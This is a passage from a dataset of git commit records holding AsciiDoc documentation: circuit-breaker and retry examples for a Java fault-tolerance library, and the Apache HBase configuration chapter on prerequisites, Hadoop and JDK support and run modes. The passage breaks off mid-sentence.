exception, you can chain the method `Try.recover()`. The recovery method is only invoked, if `Try.of()` returns a `Failure<Throwable>` Monad.\n\n[source,java]\n----\n\/\/Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\");\n\n\/\/ When I decorate my function and invoke the decorated function\nTry.CheckedSupplier<String> checkedSupplier = CircuitBreaker.decorateCheckedSupplier(() -> {\n Thread.sleep(1000);\n throw new RuntimeException(\"BAM!\");\n }, circuitBreaker);\nTry<String> result = Try.of(checkedSupplier)\n .recover((throwable) -> \"Hello Recovery\");\n\n\/\/Then the function should be a success, because the exception could be recovered\nassertThat(result.isSuccess()).isTrue();\n\/\/ and the result must match the result of the recovery function.\nassertThat(result.get()).isEqualTo(\"Hello Recovery\");\n----\n\n=== Customize exception handler\nThe default exception handler counts all type of exceptions as failures and triggers the CircuitBreaker. If you want to use a custom exception handler, you have to implement the functional interface `Predicate` which has a method `test`. The Predicate must return true if the exception should count as a failure, otherwise it must return false.\nThe following example shows how to ignore an `IOException`, but all other exception types still count as failures.\n\n[source,java,indent=0]\n----\ninclude::..\/..\/test\/java\/io\/github\/robwin\/circuitbreaker\/CircuitBreakerTest.java[tags=shouldNotTriggerCircuitBreakerOpenException]\n----\n\n=== Customize event listener\nThe default event listener logs state transitions with INFO level.\n\n----\nINFO i.g.r.c.i.DefaultCircuitBreakerEventListener - CircuitBreaker 'testName' changes state from CLOSED to OPEN\n----\n\nIf you want to use a custom event listener, you have to implement the functional interface `CircuitBreakerEventListener` which has a method `onCircuitBreakerEvent(CircuitBreakerEvent circuitBreakerEvent)`. The only event which currently exists is `CircuitBreakerStateTransitionEvent`.\n\n[source,java]\n----\nCircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()\n .onCircuitBreakerEvent((event) -> LOG.info(event.toString()))\n .build();\n----\n\n=== Retry a failed function\n\nYou can also retry a failed function and recover from the exception, if the maximum retry count was reached. You can create a `Retry` context using a default configuration as follows.\n\n[source,java]\n----\n\/\/ Create a Retry context with a default global configuration\n\/\/ (maxAttempts = 3, waitInterval = 500[ms], ignoredExceptions = empty)\nRetry retryContext = Retry.ofDefaults();\n----\n\nIn order to create a custom `Retry` context, you can use the Retry context builder. You can configure the maximum number of retry attempts and the wait interval [ms] between successive attempts. Furthermore, you can add exceptions to the ignore list which must not trigger a retry.\n\n[source,java]\n----\nRetry retryContext = Retry.custom()\n .maxAttempts(2)\n .waitInterval(1000)\n .onException(throwable -> Match.of(throwable)\n .whenType(WebServiceException.class).then(false)\n .otherwise(true).get())\n .build();\n----\n\nYou can decorate any `Supplier \/ Runnable \/ Function` or `CheckedSupplier \/ CheckedRunnable \/ CheckedFunction` function with `Retry.retryableCheckedSupplier()`, `Retry.retryableCheckedRunnable()` or `Retry.retryableCheckedFunction()`.\n\n[source,java]\n----\n\/\/ Given I have a HelloWorldService which throws an exception\nHelloWorldService helloWorldService = mock(HelloWorldService.class);\ngiven(helloWorldService.sayHelloWorld()).willThrow(new WebServiceException(\"BAM!\"));\n\n\/\/ Create a Retry with default configuration\n\/\/ (maxAttempts = 3, waitInterval = 500[ms], ignoredExceptions = empty)\nRetry retryContext = Retry.ofDefaults();\n\/\/ Decorate the invocation of the HelloWorldService\nTry.CheckedSupplier<String> retryableSupplier = Retry.retryableCheckedSupplier(helloWorldService::sayHelloWorld, retryContext);\n\n\/\/ When I invoke the function\nTry<String> result = Try.of(retryableSupplier).recover((throwable) -> \"Hello world from recovery function\");\n\n\/\/ Then the helloWorldService should be invoked 3 times\nBDDMockito.then(helloWorldService).should(times(3)).sayHelloWorld();\n\/\/ and the exception should be handled by the recovery function\nassertThat(result.get()).isEqualTo(\"Hello world from recovery function\");\n----\n\n=== CompletableFuture example\n\nYou can also invoke a decorated function asynchronously by using a `CompletableFuture` and chain further functions.\n\n[source,java]\n----\n\/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"testName\");\n\n\/\/ When\nSupplier<String> decoratedSupplier = CircuitBreaker\n .decorateSupplier(() -> \"This can be any method which returns: 'Hello\", circuitBreaker);\n\nCompletableFuture<String> future = CompletableFuture.supplyAsync(decoratedSupplier)\n .thenApply(value -> value + \" world'\");\n\n\/\/Then\nassertThat(future.get()).isEqualTo(\"This can be any method which returns: 'Hello world'\");\n----\n\n=== Reactive Streams example\n\nYou can also invoke a decorated function asynchronously by using a Reactive Streams implementation like https:\/\/github.com\/ReactiveX\/RxJava[RxJava] or https:\/\/github.com\/reactor\/reactor\/[Project Reactor].\n\n[source,java]\n----\n \/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"testName\");\n\/\/ CircuitBreaker is initially CLOSED\ncircuitBreaker.recordFailure(new RuntimeException());\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.CLOSED);\n\/\/ CircuitBreaker is still CLOSED, because 1 failure is allowed\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.CLOSED);\ncircuitBreaker.recordFailure(new RuntimeException());\n\/\/ CircuitBreaker is OPEN, because maxFailures > 1\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.OPEN);\n\n\/\/ Decorate the supplier of the HelloWorldService with CircuitBreaker functionality\nSupplier<String> supplier = CircuitBreaker.decorateSupplier(() -> \"Hello world\", circuitBreaker);\n\n\/\/When I consume from a reactive stream it should forward the CircuitBreakerOpenException.\nStreams.generate(supplier::get)\n .map(value -> value + \" from reactive streams\")\n .consume(value -> {\n LOG.info(value);\n }, exception -> {\n LOG.info(\"Exception handled: \" + exception.toString());\n assertThat(exception).isInstanceOf(CircuitBreakerOpenException.class);\n });\n----\n\n=== Example with Dropwizard Metrics\n\nYou can use https:\/\/dropwizard.github.io\/metrics\/[Dropwizard Metrics] to get runtime metrics of your functions. The project provides several higher-order functions to decorate any `Supplier \/ Runnable \/ Function` or `CheckedSupplier \/ CheckedRunnable \/ CheckedFunction`. The decorator creates a histogram and a meter for your function. A histogram measures min, mean, max, standard deviation and quantiles like the median or 95th percentile of the execution time. A meter measures the rate of executions.\n\n\n[source,java]\n----\n\/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\");\nMetricRegistry metricRegistry = new MetricRegistry();\nTimer timer = metricRegistry.timer(name(\"test\"));\n\n\/\/ When I create a long running supplier which takes 2 seconds\nTry.CheckedSupplier<String> supplier = () -> {\n Thread.sleep(2000);\n return \"Hello world\";\n};\n\n\/\/ and decorate the supplier with a Metrics timer\nTry.CheckedSupplier<String> timedSupplier = Metrics.timedCheckedSupplier(supplier, timer);\n\n\/\/ and decorate the supplier with a CircuitBreaker\nTry.CheckedSupplier<String> circuitBreakerAndTimedSupplier = CircuitBreaker\n .decorateCheckedSupplier(timedSupplier, circuitBreaker);\n\nString value = circuitBreakerAndTimedSupplier.get();\n\n\/\/ Then the Metrics execution counter should be 1\nassertThat(timer.getCount()).isEqualTo(1);\n\/\/ and the mean time should be greater than 2[s]\nassertThat(timer.getSnapshot().getMean()).isGreaterThan(2);\n\nassertThat(value).isEqualTo(\"Hello world\");\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"709b4a82d73d4930c2af6f88293698aaf71c42d6","subject":"Upgrade source cluster to lastest z-stream release","message":"Upgrade source cluster to lastest z-stream release\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/migration-prerequisites.adoc","new_file":"modules\/migration-prerequisites.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51a4831fcd405ae98ff0061852118896496e87d6","subject":"Update 2016-02-06-.adoc","message":"Update 2016-02-06-.adoc","repos":"Oziabr\/Oziabr.github.io,Oziabr\/Oziabr.github.io","old_file":"_posts\/2016-02-06-.adoc","new_file":"_posts\/2016-02-06-.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"688ba19e70596917773cf3664d1a0b3fcd107cb5","subject":"fix smart quotes","message":"fix smart quotes\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/contributions\/pages\/tools\/navigation.adoc","new_file":"docs\/modules\/contributions\/pages\/tools\/navigation.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"9ea1a7d422080fab2e7621ad5629322dc01de1f7","subject":"HBASE-20264 add Javas 9 and 10 to the prerequisites table and add a note about using LTS releases.","message":"HBASE-20264 add Javas 9 and 10 to the prerequisites table and add a note about using LTS releases.\n\n* Make the #java anchor point at a section instead of directly at a table\n* Add a note to the intro of that section about LTS JDKs\n* Add columns for JDK9 and JDK10 that say unsupported and point to HBASE-20264\n\nSigned-off-by: Zach York <21e0ab0297705b6f8993d0122af3564835bb8db2@amazon.com>\n","repos":"Apache9\/hbase,francisliu\/hbase,apurtell\/hbase,mahak\/hbase,ChinmaySKulkarni\/hbase,apurtell\/hbase,ultratendency\/hbase,ultratendency\/hbase,ndimiduk\/hbase,ChinmaySKulkarni\/hbase,apurtell\/hbase,francisliu\/hbase,Apache9\/hbase,apurtell\/hbase,mahak\/hbase,Apache9\/hbase,bijugs\/hbase,ndimiduk\/hbase,ChinmaySKulkarni\/hbase,francisliu\/hbase,Apache9\/hbase,ndimiduk\/hbase,francisliu\/hbase,mahak\/hbase,ndimiduk\/hbase,bijugs\/hbase,ChinmaySKulkarni\/hbase,apurtell\/hbase,mahak\/hbase,mahak\/hbase,Eshcar\/hbase,bijugs\/hbase,ChinmaySKulkarni\/hbase,ultratendency\/hbase,Eshcar\/hbase,ndimiduk\/hbase,apurtell\/hbase,Eshcar\/hbase,mahak\/hbase,ChinmaySKulkarni\/hbase,Apache9\/hbase,francisliu\/hbase,ultratendency\/hbase,francisliu\/hbase,mahak\/hbase,ndimiduk\/hbase,francisliu\/hbase,bijugs\/hbase,apurtell\/hbase,mahak\/hbase,bijugs\/hbase,ultratendency\/hbase,ultratendency\/hbase,francisliu\/hbase,ChinmaySKulkarni\/hbase,ndimiduk\/hbase,mahak\/hbase,Eshcar\/hbase,apurtell\/hbase,mahak\/hbase,ndimiduk\/hbase,Eshcar\/hbase,Eshcar\/hbase,ultratendency\/hbase,ChinmaySKulkarni\/hbase,Eshcar\/hbase,ndimiduk\/hbase,Eshcar\/hbase,Apache9\/hbase,ndimiduk\/hbase,ChinmaySKulkarni\/hbase,bijugs\/hbase,ultratendency\/hbase,Apache9\/hbase,ultratendency\/hbase,apurtell\/hbase,francisliu\/hbase,Eshcar\/hbase,bijugs\/hbase,Apache9\/hbase,bijugs\/hbase,bijugs\/hbase,Eshcar\/hbase,Apache9\/hbase,Apache9\/hbase,francisliu\/hbase,apurtell\/hbase,bijugs\/hbase,ChinmaySKulkarni\/hbase,ultratendency\/hbase","old_file":"src\/main\/asciidoc\/_chapters\/configuration.adoc","new_file":"src\/main\/asciidoc\/_chapters\/configuration.adoc","new_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n[[configuration]]\n= Apache HBase Configuration\n:doctype: book\n:numbered:\n:toc: left\n:icons: font\n:experimental:\n\nThis chapter expands upon the <<getting_started>> chapter to further explain configuration of Apache HBase.\nPlease read this chapter carefully, especially the <<basic.prerequisites,Basic Prerequisites>>\nto ensure that your HBase testing and deployment goes smoothly, and prevent data loss.\nFamiliarize yourself with <<hbase_supported_tested_definitions>> as well.\n\n== Configuration Files\nApache HBase uses the same configuration system as Apache Hadoop.\nAll configuration files are located in the _conf\/_ directory, which needs to be kept in sync for each node on your cluster.\n\n.HBase Configuration File Descriptions\n_backup-masters_::\n Not present by default.\n A plain-text file which lists hosts on which the Master should start a backup Master process, one host per line.\n\n_hadoop-metrics2-hbase.properties_::\n Used to connect HBase Hadoop's Metrics2 framework.\n See the link:https:\/\/wiki.apache.org\/hadoop\/HADOOP-6728-MetricsV2[Hadoop Wiki entry] for more information on Metrics2.\n Contains only commented-out examples by default.\n\n_hbase-env.cmd_ and _hbase-env.sh_::\n Script for Windows and Linux \/ Unix environments to set up the working environment for HBase, including the location of Java, Java options, and other environment variables.\n The file contains many commented-out examples to provide guidance.\n\n_hbase-policy.xml_::\n The default policy configuration file used by RPC servers to make authorization decisions on client requests.\n Only used if HBase <<security,security>> is enabled.\n\n_hbase-site.xml_::\n The main HBase configuration file.\n This file specifies configuration options which override HBase's default configuration.\n You can view (but do not edit) the default configuration file at _docs\/hbase-default.xml_.\n You can also view the entire effective configuration for your cluster (defaults and overrides) in the [label]#HBase Configuration# tab of the HBase Web UI.\n\n_log4j.properties_::\n Configuration file for HBase logging via `log4j`.\n\n_regionservers_::\n A plain-text file containing a list of hosts which should run a RegionServer in your HBase cluster.\n By default this file contains the single entry `localhost`.\n It should contain a list of hostnames or IP addresses, one per line, and should only contain `localhost` if each node in your cluster will run a RegionServer on its `localhost` interface.\n\n.Checking XML Validity\n[TIP]\n====\nWhen you edit XML, it is a good idea to use an XML-aware editor to be sure that your syntax is correct and your XML is well-formed.\nYou can also use the `xmllint` utility to check that your XML is well-formed.\nBy default, `xmllint` re-flows and prints the XML to standard output.\nTo check for well-formedness and only print output if errors exist, use the command `xmllint -noout filename.xml`.\n====\n.Keep Configuration In Sync Across the Cluster\n[WARNING]\n====\nWhen running in distributed mode, after you make an edit to an HBase configuration, make sure you copy the contents of the _conf\/_ directory to all nodes of the cluster.\nHBase will not do this for you.\nUse `rsync`, `scp`, or another secure mechanism for copying the configuration files to your nodes.\nFor most configurations, a restart is needed for servers to pick up changes. Dynamic configuration is an exception to this, to be described later below.\n====\n\n[[basic.prerequisites]]\n== Basic Prerequisites\n\nThis section lists required services and some required system configuration.\n\n[[java]]\n.Java\n\nThe following table summarizes the recommendation of the HBase community wrt deploying on various Java versions. An entry of \"yes\" is meant to indicate a base level of testing and willingness to help diagnose and address issues you might run into. Similarly, an entry of \"no\" or \"Not Supported\" generally means that should you run into an issue the community is likely to ask you to change the Java environment before proceeding to help. In some cases, specific guidance on limitations (e.g. wether compiling \/ unit tests work, specific operational issues, etc) will also be noted.\n\n.Long Term Support JDKs are recommended\n[TIP]\n====\nHBase recommends downstream users rely on JDK releases that are marked as Long Term Supported (LTS) either from the OpenJDK project or vendors. As of March 2018 that means Java 8 is the only applicable version and that the next likely version to see testing will be Java 11 near Q3 2018.\n====\n\n.Java support by release line\n[cols=\"1,1,1,1,1\", options=\"header\"]\n|===\n|HBase Version\n|JDK 7\n|JDK 8\n|JDK 9\n|JDK 10\n\n|2.0\n|link:http:\/\/search-hadoop.com\/m\/YGbbsPxZ723m3as[Not Supported]\n|yes\n|link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-20264[Not Supported]\n|link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-20264[Not Supported]\n\n|1.3\n|yes\n|yes\n|link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-20264[Not Supported]\n|link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-20264[Not Supported]\n\n\n|1.2\n|yes\n|yes\n|link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-20264[Not Supported]\n|link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-20264[Not Supported]\n\n|===\n\nNOTE: HBase will neither build nor compile with Java 6.\n\nNOTE: You must set `JAVA_HOME` on each node of your cluster. _hbase-env.sh_ provides a handy mechanism to do this.\n\n[[os]]\n.Operating System Utilities\nssh::\n HBase uses the Secure Shell (ssh) command and utilities extensively to communicate between cluster nodes. Each server in the cluster must be running `ssh` so that the Hadoop and HBase daemons can be managed. You must be able to connect to all nodes via SSH, including the local node, from the Master as well as any backup Master, using a shared key rather than a password. You can see the basic methodology for such a set-up in Linux or Unix systems at \"<<passwordless.ssh.quickstart>>\". If your cluster nodes use OS X, see the section, link:https:\/\/wiki.apache.org\/hadoop\/Running_Hadoop_On_OS_X_10.5_64-bit_%28Single-Node_Cluster%29[SSH: Setting up Remote Desktop and Enabling Self-Login] on the Hadoop wiki.\n\nDNS::\n HBase uses the local hostname to self-report its IP address. Both forward and reverse DNS resolving must work in versions of HBase previous to 0.92.0. The link:https:\/\/github.com\/sujee\/hadoop-dns-checker[hadoop-dns-checker] tool can be used to verify DNS is working correctly on the cluster. The project `README` file provides detailed instructions on usage.\n\nLoopback IP::\n Prior to hbase-0.96.0, HBase only used the IP address `127.0.0.1` to refer to `localhost`, and this was not configurable.\n See <<loopback.ip,Loopback IP>> for more details.\n\nNTP::\n The clocks on cluster nodes should be synchronized. A small amount of variation is acceptable, but larger amounts of skew can cause erratic and unexpected behavior. Time synchronization is one of the first things to check if you see unexplained problems in your cluster. It is recommended that you run a Network Time Protocol (NTP) service, or another time-synchronization mechanism on your cluster and that all nodes look to the same service for time synchronization. See the link:http:\/\/www.tldp.org\/LDP\/sag\/html\/basic-ntp-config.html[Basic NTP Configuration] at [citetitle]_The Linux Documentation Project (TLDP)_ to set up NTP.\n\n[[ulimit]]\nLimits on Number of Files and Processes (ulimit)::\n Apache HBase is a database. It requires the ability to open a large number of files at once. Many Linux distributions limit the number of files a single user is allowed to open to `1024` (or `256` on older versions of OS X). You can check this limit on your servers by running the command `ulimit -n` when logged in as the user which runs HBase. See <<trouble.rs.runtime.filehandles,the Troubleshooting section>> for some of the problems you may experience if the limit is too low. You may also notice errors such as the following:\n+\n----\n2010-04-06 03:04:37,542 INFO org.apache.hadoop.hdfs.DFSClient: Exception increateBlockOutputStream java.io.EOFException\n2010-04-06 03:04:37,542 INFO org.apache.hadoop.hdfs.DFSClient: Abandoning block blk_-6935524980745310745_1391901\n----\n+\nIt is recommended to raise the ulimit to at least 10,000, but more likely 10,240, because the value is usually expressed in multiples of 1024. Each ColumnFamily has at least one StoreFile, and possibly more than six StoreFiles if the region is under load. The number of open files required depends upon the number of ColumnFamilies and the number of regions. The following is a rough formula for calculating the potential number of open files on a RegionServer.\n+\n.Calculate the Potential Number of Open Files\n----\n(StoreFiles per ColumnFamily) x (regions per RegionServer)\n----\n+\nFor example, assuming that a schema had 3 ColumnFamilies per region with an average of 3 StoreFiles per ColumnFamily, and there are 100 regions per RegionServer, the JVM will open `3 * 3 * 100 = 900` file descriptors, not counting open JAR files, configuration files, and others. Opening a file does not take many resources, and the risk of allowing a user to open too many files is minimal.\n+\nAnother related setting is the number of processes a user is allowed to run at once. In Linux and Unix, the number of processes is set using the `ulimit -u` command. This should not be confused with the `nproc` command, which controls the number of CPUs available to a given user. Under load, a `ulimit -u` that is too low can cause OutOfMemoryError exceptions. See Jack Levin's major HDFS issues thread on the hbase-users mailing list, from 2011.\n+\nConfiguring the maximum number of file descriptors and processes for the user who is running the HBase process is an operating system configuration, rather than an HBase configuration. It is also important to be sure that the settings are changed for the user that actually runs HBase. To see which user started HBase, and that user's ulimit configuration, look at the first line of the HBase log for that instance. A useful read setting config on your hadoop cluster is Aaron Kimball's Configuration Parameters: What can you just ignore?\n+\n.`ulimit` Settings on Ubuntu\n====\nTo configure ulimit settings on Ubuntu, edit _\/etc\/security\/limits.conf_, which is a space-delimited file with four columns. Refer to the man page for _limits.conf_ for details about the format of this file. In the following example, the first line sets both soft and hard limits for the number of open files (nofile) to 32768 for the operating system user with the username hadoop. The second line sets the number of processes to 32000 for the same user.\n----\nhadoop - nofile 32768\nhadoop - nproc 32000\n----\nThe settings are only applied if the Pluggable Authentication Module (PAM) environment is directed to use them. To configure PAM to use these limits, be sure that the _\/etc\/pam.d\/common-session_ file contains the following line:\n----\nsession required pam_limits.so\n----\n====\n\nLinux Shell::\n All of the shell scripts that come with HBase rely on the link:http:\/\/www.gnu.org\/software\/bash[GNU Bash] shell.\n\nWindows::\n Prior to HBase 0.96, running HBase on Microsoft Windows was limited only for testing purposes.\n Running production systems on Windows machines is not recommended.\n\n\n[[hadoop]]\n=== link:https:\/\/hadoop.apache.org[Hadoop](((Hadoop)))\n\nThe following table summarizes the versions of Hadoop supported with each version of HBase.\nBased on the version of HBase, you should select the most appropriate version of Hadoop.\nYou can use Apache Hadoop, or a vendor's distribution of Hadoop.\nNo distinction is made here.\nSee link:https:\/\/wiki.apache.org\/hadoop\/Distributions%20and%20Commercial%20Support[the Hadoop wiki] for information about vendors of Hadoop.\n\n.Hadoop 2.x is recommended.\n[TIP]\n====\nHadoop 2.x is faster and includes features, such as short-circuit reads, which will help improve your HBase random read profile.\nHadoop 2.x also includes important bug fixes that will improve your overall HBase experience. HBase does not support running with\nearlier versions of Hadoop. See the table below for requirements specific to different HBase versions.\n\nHadoop 3.x is still in early access releases and has not yet been sufficiently tested by the HBase community for production use cases.\n====\n\nUse the following legend to interpret this table:\n\n.Hadoop version support matrix\n\n* \"S\" = supported\n* \"X\" = not supported\n* \"NT\" = Not tested\n\n[cols=\"1,1,1,1\", options=\"header\"]\n|===\n| | HBase-1.2.x | HBase-1.3.x | HBase-2.0.x\n|Hadoop-2.0.x-alpha | X | X | X\n|Hadoop-2.1.0-beta | X | X | X\n|Hadoop-2.2.0 | X | X | X\n|Hadoop-2.3.x | X | X | X\n|Hadoop-2.4.x | S | S | X\n|Hadoop-2.5.x | S | S | X\n|Hadoop-2.6.0 | X | X | X\n|Hadoop-2.6.1+ | S | S | S\n|Hadoop-2.7.0 | X | X | X\n|Hadoop-2.7.1+ | S | S | S\n|Hadoop-2.8.[0-1] | X | X | X\n|Hadoop-2.8.2+ | NT | NT | NT\n|Hadoop-2.9.0 | X | X | X\n|Hadoop-3.0.0 | NT | NT | NT\n|===\n\n.Hadoop Pre-2.6.1 and JDK 1.8 Kerberos\n[TIP]\n====\nWhen using pre-2.6.1 Hadoop versions and JDK 1.8 in a Kerberos environment, HBase server can fail\nand abort due to Kerberos keytab relogin error. Late version of JDK 1.7 (1.7.0_80) has the problem too.\nRefer to link:https:\/\/issues.apache.org\/jira\/browse\/HADOOP-10786[HADOOP-10786] for additional details.\nConsider upgrading to Hadoop 2.6.1+ in this case.\n====\n\n.Hadoop 2.6.x\n[TIP]\n====\nHadoop distributions based on the 2.6.x line *must* have\nlink:https:\/\/issues.apache.org\/jira\/browse\/HADOOP-11710[HADOOP-11710] applied if you plan to run\nHBase on top of an HDFS Encryption Zone. Failure to do so will result in cluster failure and\ndata loss. This patch is present in Apache Hadoop releases 2.6.1+.\n====\n\n.Hadoop 2.y.0 Releases\n[TIP]\n====\nStarting around the time of Hadoop version 2.7.0, the Hadoop PMC got into the habit of calling out new minor releases on their major version 2 release line as not stable \/ production ready. As such, HBase expressly advises downstream users to avoid running on top of these releases. Note that additionally the 2.8.1 was release was given the same caveat by the Hadoop PMC. For reference, see the release announcements for link:https:\/\/s.apache.org\/hadoop-2.7.0-announcement[Apache Hadoop 2.7.0], link:https:\/\/s.apache.org\/hadoop-2.8.0-announcement[Apache Hadoop 2.8.0], link:https:\/\/s.apache.org\/hadoop-2.8.1-announcement[Apache Hadoop 2.8.1], and link:https:\/\/s.apache.org\/hadoop-2.9.0-announcement[Apache Hadoop 2.9.0].\n====\n\n.Replace the Hadoop Bundled With HBase!\n[NOTE]\n====\nBecause HBase depends on Hadoop, it bundles an instance of the Hadoop jar under its _lib_ directory.\nThe bundled jar is ONLY for use in standalone mode.\nIn distributed mode, it is _critical_ that the version of Hadoop that is out on your cluster match what is under HBase.\nReplace the hadoop jar found in the HBase lib directory with the hadoop jar you are running on your cluster to avoid version mismatch issues.\nMake sure you replace the jar in HBase across your whole cluster.\nHadoop version mismatch issues have various manifestations but often all look like its hung.\n====\n\n[[dfs.datanode.max.transfer.threads]]\n==== `dfs.datanode.max.transfer.threads` (((dfs.datanode.max.transfer.threads)))\n\nAn HDFS DataNode has an upper bound on the number of files that it will serve at any one time.\nBefore doing any loading, make sure you have configured Hadoop's _conf\/hdfs-site.xml_, setting the `dfs.datanode.max.transfer.threads` value to at least the following:\n\n[source,xml]\n----\n\n<property>\n <name>dfs.datanode.max.transfer.threads<\/name>\n <value>4096<\/value>\n<\/property>\n----\n\nBe sure to restart your HDFS after making the above configuration.\n\nNot having this configuration in place makes for strange-looking failures.\nOne manifestation is a complaint about missing blocks.\nFor example:\n\n----\n10\/12\/08 20:10:31 INFO hdfs.DFSClient: Could not obtain block\n blk_XXXXXXXXXXXXXXXXXXXXXX_YYYYYYYY from any node: java.io.IOException: No live nodes\n contain current block. Will get new block locations from namenode and retry...\n----\n\nSee also <<casestudies.max.transfer.threads,casestudies.max.transfer.threads>> and note that this property was previously known as `dfs.datanode.max.xcievers` (e.g. link:http:\/\/ccgtech.blogspot.com\/2010\/02\/hadoop-hdfs-deceived-by-xciever.html[Hadoop HDFS: Deceived by Xciever]).\n\n[[zookeeper.requirements]]\n=== ZooKeeper Requirements\n\nZooKeeper 3.4.x is required.\nHBase makes use of the `multi` functionality that is only available since Zookeeper 3.4.0. The `hbase.zookeeper.useMulti` configuration property defaults to `true`.\nRefer to link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-12241[HBASE-12241 (The crash of regionServer when taking deadserver's replication queue breaks replication)] and link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-6775[HBASE-6775 (Use ZK.multi when available for HBASE-6710 0.92\/0.94 compatibility fix)] for background.\nThe property is deprecated and useMulti is always enabled in HBase 2.0.\n\n[[standalone_dist]]\n== HBase run modes: Standalone and Distributed\n\nHBase has two run modes: <<standalone,standalone>> and <<distributed,distributed>>.\nOut of the box, HBase runs in standalone mode.\nWhatever your mode, you will need to configure HBase by editing files in the HBase _conf_ directory.\nAt a minimum, you must edit [code]+conf\/hbase-env.sh+ to tell HBase which +java+ to use.\nIn this file you set HBase environment variables such as the heapsize and other options for the `JVM`, the preferred location for log files, etc.\nSet [var]+JAVA_HOME+ to point at the root of your +java+ install.\n\n[[standalone]]\n=== Standalone HBase\n\nThis is the default mode.\nStandalone mode is what is described in the <<quickstart,quickstart>> section.\nIn standalone mode, HBase does not use HDFS -- it uses the local filesystem instead -- and it runs all HBase daemons and a local ZooKeeper all up in the same JVM.\nZooKeeper binds to a well known port so clients may talk to HBase.\n\n[[standalone.over.hdfs]]\n==== Standalone HBase over HDFS\nA sometimes useful variation on standalone hbase has all daemons running inside the\none JVM but rather than persist to the local filesystem, instead\nthey persist to an HDFS instance.\n\nYou might consider this profile when you are intent on\na simple deploy profile, the loading is light, but the\ndata must persist across node comings and goings. Writing to\nHDFS where data is replicated ensures the latter.\n\nTo configure this standalone variant, edit your _hbase-site.xml_\nsetting _hbase.rootdir_ to point at a directory in your\nHDFS instance but then set _hbase.cluster.distributed_\nto _false_. For example:\n\n[source,xml]\n----\n<configuration>\n <property>\n <name>hbase.rootdir<\/name>\n <value>hdfs:\/\/namenode.example.org:8020\/hbase<\/value>\n <\/property>\n <property>\n <name>hbase.cluster.distributed<\/name>\n <value>false<\/value>\n <\/property>\n<\/configuration>\n----\n\n[[distributed]]\n=== Distributed\n\nDistributed mode can be subdivided into distributed but all daemons run on a single node -- a.k.a. _pseudo-distributed_ -- and _fully-distributed_ where the daemons are spread across all nodes in the cluster.\nThe _pseudo-distributed_ vs. _fully-distributed_ nomenclature comes from Hadoop.\n\nPseudo-distributed mode can run against the local filesystem or it can run against an instance of the _Hadoop Distributed File System_ (HDFS). Fully-distributed mode can ONLY run on HDFS.\nSee the Hadoop link:https:\/\/hadoop.apache.org\/docs\/current\/[documentation] for how to set up HDFS.\nA good walk-through for setting up HDFS on Hadoop 2 can be found at http:\/\/www.alexjf.net\/blog\/distributed-systems\/hadoop-yarn-installation-definitive-guide.\n\n[[pseudo]]\n==== Pseudo-distributed\n\n.Pseudo-Distributed Quickstart\n[NOTE]\n====\nA quickstart has been added to the <<quickstart,quickstart>> chapter.\nSee <<quickstart_pseudo,quickstart-pseudo>>.\nSome of the information that was originally in this section has been moved there.\n====\n\nA pseudo-distributed mode is simply a fully-distributed mode run on a single host.\nUse this HBase configuration for testing and prototyping purposes only.\nDo not use this configuration for production or for performance evaluation.\n\n[[fully_dist]]\n=== Fully-distributed\n\nBy default, HBase runs in standalone mode.\nBoth standalone mode and pseudo-distributed mode are provided for the purposes of small-scale testing.\nFor a production environment, distributed mode is advised.\nIn distributed mode, multiple instances of HBase daemons run on multiple servers in the cluster.\n\nJust as in pseudo-distributed mode, a fully distributed configuration requires that you set the `hbase.cluster.distributed` property to `true`.\nTypically, the `hbase.rootdir` is configured to point to a highly-available HDFS filesystem.\n\nIn addition, the cluster is configured so that multiple cluster nodes enlist as RegionServers, ZooKeeper QuorumPeers, and backup HMaster servers.\nThese 